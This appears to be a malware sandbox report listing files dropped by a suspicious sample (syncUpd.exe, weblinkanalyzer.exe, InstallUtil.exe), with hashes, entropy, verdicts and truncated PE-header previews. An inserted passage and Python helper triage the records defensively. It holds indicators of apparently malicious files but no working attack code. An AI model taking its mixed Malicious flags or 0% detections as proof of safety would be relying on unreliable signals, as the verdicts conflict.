                                                                                                                                                                                                                                SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview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

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):1310720
Entropy (8bit):1.307364786188888
Encrypted:false
SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr8:KooCEYhgYEL0In
MD5:B54DF40BD44A7AF1B6B94F969F3696E6
SHA1:90C69AF1469C77F870AF22F952741805BBD7135B
SHA-256:1D358388DEF64FC39CD4A0634DA78CAB2C3AD4848551C1948FB12CE963CCCF0D
SHA-512:A88E1BDEE38BDFF570B0B6E7DB174092136E4036EAE9B22C50CEB9DD457E9275EA1F3A715A4946FA9DB0CAA06D600B2555CA43C6B6C62023E672D7098212F02E
Malicious:false
Reputation:unknown

Process:C:\Windows\System32\svchost.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x63cfdb75, page size 16384, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.4221572027640014
Encrypted:false
SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
MD5:96342CA2002D24D88EFAD4B93AC91384
SHA1:E24CF1424314549E642F1037C103BC6D0E20C884
SHA-256:84E2F2B036626B34345123DD75916EDA453835ADB60543958828A2B56785C4D3
SHA-512:5B92A502C34A5F854C4828CDB1D3E9D4E1C78841B20F81B24BA75DC1F6A4DE7E69FDBBC1FAC133CC7FFBE9581CC7C8426DCDCCA948C9E3E9BE30CA4E14C22923
Malicious:false
Reputation:unknown

Process:C:\Windows\System32\svchost.exe
File Type:PGP symmetric key encrypted data - salted & iterated -
Category:dropped
Size (bytes):16384
Entropy (8bit):0.07664768309124734
Encrypted:false
SSDEEP:3:hEYebQpnkjn13a/KR/lollcVO/lnlZMxZNQl:Ozb+k53qKsOewk
MD5:B97A41EB8A8007C73D78DB193C877B94
SHA1:A90DB30FCF22A0DF1B64029C0D34DD7BC3AD9C26
SHA-256:7DB8D459541E819B5834F51FDA1B5EF76942C5A98CC5F54CB4C5323B5B6259F2
SHA-512:BDD8250645DBCE45D7D7417CA6283036FD044546070EB6137897519F3C2674211122296246A400490A9FC8126ECF330B22CE8A0A382FDA130E5B511C18301F02
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.696250160603532
Encrypted:false
SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.695685570184741
Encrypted:false
SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:A28F7445BB3D064C83EB9DBC98091F76
SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.700014595314478
Encrypted:false
SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:960373CA97DEDBA8576ECF40D0D1E39D
SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):685392
Entropy (8bit):6.872871740790978
Encrypted:false
SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:550686C0EE48C386DFCB40199BD076AC
SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4
                                                                                                                                                                                                                                Entropy (8bit):0.8112781244591328
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:A:A
                                                                                                                                                                                                                                MD5:2084B86EB5BC3C8E57DF7CCE0FCC415A
                                                                                                                                                                                                                                SHA1:F1A7C5275567C3EAE7920D18A9631075DF483D87
                                                                                                                                                                                                                                SHA-256:DCD1430B981B4550707E196A4954598D6BD8A4F078FD0AB883EB9E857242811D
                                                                                                                                                                                                                                SHA-512:B0C1121E93E9ADB732C171144A35F62C6F7FD16E366756F6BF7A3C7AB9921F8B8BDCABDE5BFF39C463AEABB3B7088889B80EDCA46C280EF18E7670579AFDE1D1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:%...
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):128
                                                                                                                                                                                                                                Entropy (8bit):2.9545817380615236
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                                                                                                                                                                                MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                                                                                                                                                                                SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                                                                                                                                                                                SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                                                                                                                                                                                SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):128
                                                                                                                                                                                                                                Entropy (8bit):1.2701231977328944
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:WAmJuXDz8/:HHzc
                                                                                                                                                                                                                                MD5:0D6174E4525CFDED5DD1C9440B9DC1E7
                                                                                                                                                                                                                                SHA1:173EF30A035CE666278904625EADCFAE09233A47
                                                                                                                                                                                                                                SHA-256:458677CDF0E1A4E87D32AB67D6A5EEA9E67CB3545D79A21A0624E6BB5E1087E7
                                                                                                                                                                                                                                SHA-512:86DA96385985A1BA3D67A8676A041CA563838F474DF33D82B6ECD90C101703B30747121A6B7281E025A3C11CE28ACCEDFC94DB4E8D38E391199458056C2CD27A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:ccddf9e705966c2f471db9..........................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                                                                                                                                                                                                                                File Type:ISO-8859 text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):8
                                                                                                                                                                                                                                Entropy (8bit):2.0
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:BAl/:Ct
                                                                                                                                                                                                                                MD5:CE3C0935D6928C36058544F5D554B756
                                                                                                                                                                                                                                SHA1:E91D28A60EB85B0A9D11764C8562AF5D3E335A28
                                                                                                                                                                                                                                SHA-256:561E457783D85C19D3E999886E7BB6F6BB170D7466552F05EF800A733D05E876
                                                                                                                                                                                                                                SHA-512:2268E8BFDB46AB6E5DC4001BD5145A9B9A23720F51F3F28CBF633CDF5ABE14729A703AAE90461C7CC94B595CEC75AF1BDDE39DA7006E8B39ABDEAB5E33FE53F7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:b..e....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69211 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69211
                                                                                                                                                                                                                                Entropy (8bit):7.995787876711886
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:4vHkVfDISE//aDY0WAXTF+0daIpyFQaqPZkatNjgkFOE4/JZZWnEn6:4vHKfMSeKFXdBcmnXkksE40E6
                                                                                                                                                                                                                                MD5:753DF6889FD7410A2E9FE333DA83A429
                                                                                                                                                                                                                                SHA1:3C425F16E8267186061DD48AC1C77C122962456E
                                                                                                                                                                                                                                SHA-256:B42DC237E44CBC9A43400E7D3F9CBD406DBDEFD62BFE87328F8663897D69DF78
                                                                                                                                                                                                                                SHA-512:9D56F79410AD0CF852C74C3EF9454E7AE86E80BDD6FF67773994B48CCAC71142BCF5C90635DA6A056E1406E81E64674DB9584928E867C55B77B59E2851CF6444
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MSCF....[.......,...................I..................WR. .authroot.stl..L...5..CK..<Tk...p.k:.]...k..-.o.d.}.N.F....!.....$t)K."..DE.....v..gr...}?>.<.s..<...{.t..\F.e.F...8&.<..>...t8....`dqM4.y..t8..t..3..1.`\.:+.<].F...3.~.M.B...*..J....PR.+..UUUV.GY...8...._vl.....H}.s.Pq..r.<.0.lG.C..e(..oe........9..'8..m.......G8T......sR..&=.*J....s.U......#...).j...x.....gq.+.N:.Wj...V.t...(J.;^..Mr~e..}.q....q....eo..O.....@.B.S.....66.|!.(.........D!k..&.. /.....H~.....}.(..|.S..~8..A..(.#..w.*Y.....'.F...y&.8......f..49r..N...(zX.0;.....000.3c)Z.v.5N'.z...rNFw,E.NY..#ua.o.$..Y?.-.=....}d.*..]......x_<.W....ya.3.a..SQT.U..|!.pyCA..-h..Y..>n......^.U.....H...EY.\.......}.-(....h..=xiV.O.W@p.=.r.i..c...c....S.x.;..GWf...=.:.....S.c/..v..3.iG<.&..%...8..=}.....+.n\?0"A.Y%<......+..O. .9..#..>.....5.2.j.1<.Z.>v..j...wr.i.:....!...;.N[.q..z9j..l.R.&,....$.V...k.j..Tc..m..D!%....".Y.#V."w.|....L| ..p........w.=..ck...<........{s..w..};../.=...k....YH.
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):290
                                                                                                                                                                                                                                Entropy (8bit):2.9392972481855573
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:kK7CerN+SkQlPlEGYRMY9z+4KlDA3RUe/:TCeEkPlE99SNxAhUe/
                                                                                                                                                                                                                                MD5:74DE14D33AA398FE9191D826B34418DE
                                                                                                                                                                                                                                SHA1:E46A314F4B32A78C5C6978F14B5DB0FAA290A3E8
                                                                                                                                                                                                                                SHA-256:5E91F96481F5087058850F2F051F5EE2E68779923B4CDFE781A946FF15BA846D
                                                                                                                                                                                                                                SHA-512:FF6BACE48E70A522C8D9B87D06681CF5F0FEA87F40A6BF2FD3B24E2E5EF782E338A7C8335195F6ECF0A84CF91951746F1F715388E3E11F9C5FB3E281E5F17375
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:p...... .........-..it..(....................................................... .........;.i..................[...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...
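The authroot.stl cabinet above and the 290-byte "data" file whose preview spells out, as UTF-16LE, http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab are Windows CryptoAPI fetching its root certificate trust list (the CAB is downloaded when a certificate chain is validated; the small file is the CryptnetUrlCache metadata for that download). They appear in most sandbox runs independent of the sample, and the Encrypted field is an entropy heuristic, so a tightly compressed CAB at 7.996 bits per byte trips it just as ciphertext would. The Python below is an added triage helper, not part of the Joe Sandbox report: it parses records in this section's Key:Value layout, recomputes the 8-bit Shannon entropy behind the "Entropy (8bit)" column, groups records by SHA-256 so identical content dropped to several paths by InstallUtil.exe is handled once, and tags each unique file. The sample records are constructed from values listed on this page; the 7.5-bit packing threshold and the tag names are assumptions of this example, not sandbox categories.

```python
import math
import re
from collections import Counter

# Constructed sample in the Key:Value layout of this report's dropped-file records;
# values transcribed from the page, cut down to SHA-256 and the relevant preview fragment.
SAMPLE_REPORT = """\
Process:C:\\Users\\user\\Desktop\\file.exe
File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69211 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Entropy (8bit):7.995787876711886
SHA-256:B42DC237E44CBC9A43400E7D3F9CBD406DBDEFD62BFE87328F8663897D69DF78
Malicious:true
Process:C:\\Users\\user\\Desktop\\file.exe
File Type:data
Entropy (8bit):2.9392972481855573
SHA-256:5E91F96481F5087058850F2F051F5EE2E68779923B4CDFE781A946FF15BA846D
Malicious:false
Preview:h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...
Process:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Entropy (8bit):5.422209848736349
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
Malicious:false
Process:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Entropy (8bit):5.422209848736349
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
Malicious:false
Process:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):7.768478150231569
SHA-256:D415E52DE093B9E9487FCC3244F190AFEFF659473172E3292C14A8E95F2FA101
Malicious:true
Process:C:\\Users\\user\\AppData\\Local\\Temp\\syncUpd.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Entropy (8bit):6.920480786566406
SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
"""

PACKED_THRESHOLD = 7.5  # assumed cut-off for "probably packed/compressed PE"; not the sandbox's rule
CTL_MARKERS = ("authroot.stl", "ctldl.windowsupdate.com")  # CryptoAPI root-CTL auto-update traces

def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the figure the 'Entropy (8bit)' column reports."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def parse_records(text: str) -> list[dict]:
    """One dict per dropped file: a record starts at each 'Process:' line and the
    '• Antivirus: ...' bullet lines of the report are collected under 'av'."""
    records: list[dict] = []
    for line in (raw.strip() for raw in text.splitlines() if raw.strip()):
        if line.startswith("•"):
            records[-1].setdefault("av", []).append(line.lstrip("• "))
            continue
        key, _, value = line.partition(":")  # split on the first ':' only; values may contain ':'
        if key == "Process":
            records.append({})
        records[-1][key] = value.strip()
    return records

def _squash(s: str) -> str:
    # The report prints non-printable bytes as '.', so a UTF-16LE URL shows up as
    # h.t.t.p.:././...; dropping the dots makes 8-bit and UTF-16 text comparable.
    return s.replace(".", "").lower()

def triage(record: dict) -> list[str]:
    """Tag names are this example's own convention, not Joe Sandbox categories."""
    tags = []
    ftype, preview = record.get("File Type", ""), record.get("Preview", "")
    entropy = float(record.get("Entropy (8bit)", "0"))
    if any(_squash(m) in _squash(ftype) or _squash(m) in _squash(preview) for m in CTL_MARKERS):
        tags.append("ctl-autoupdate-noise")  # present in most runs, not specific to the sample
    if "PE32" in ftype:
        tags.append("pe")
        if "UPX" in ftype or entropy >= PACKED_THRESHOLD:
            tags.append("packed")
    if "Nullsoft Installer" in ftype:
        tags.append("nsis-installer")
    if record.get("Malicious") == "true":
        tags.append("sandbox-malicious")
    if any(int(p) > 0 for av in record.get("av", []) for p in re.findall(r"Detection:\s*(\d+)%", av)):
        tags.append("av-flagged")
    return tags

def summarize(text: str = SAMPLE_REPORT) -> dict[str, dict]:
    """Per unique SHA-256: how many paths the content was dropped to, which processes
    wrote it, and its tags, so identical content written twice is triaged once."""
    groups: dict[str, list[dict]] = {}
    for r in parse_records(text):
        groups.setdefault(r["SHA-256"], []).append(r)
    return {sha: {"copies": len(g), "tags": triage(g[0]),
                  "dropped_by": sorted({r["Process"] for r in g})} for sha, g in groups.items()}
```

summarize() returns one entry per unique hash; on the sample it yields five entries from six records, with the two identical HTML pages collapsed into one entry with copies == 2, the CAB and its cache record tagged ctl-autoupdate-noise, the UPX executable tagged pe and packed, and the 6.92-bit DLL left as a plain pe despite the single 0% engine result, which is exactly the case where the sandbox's Malicious verdict and the AV column disagree.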
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
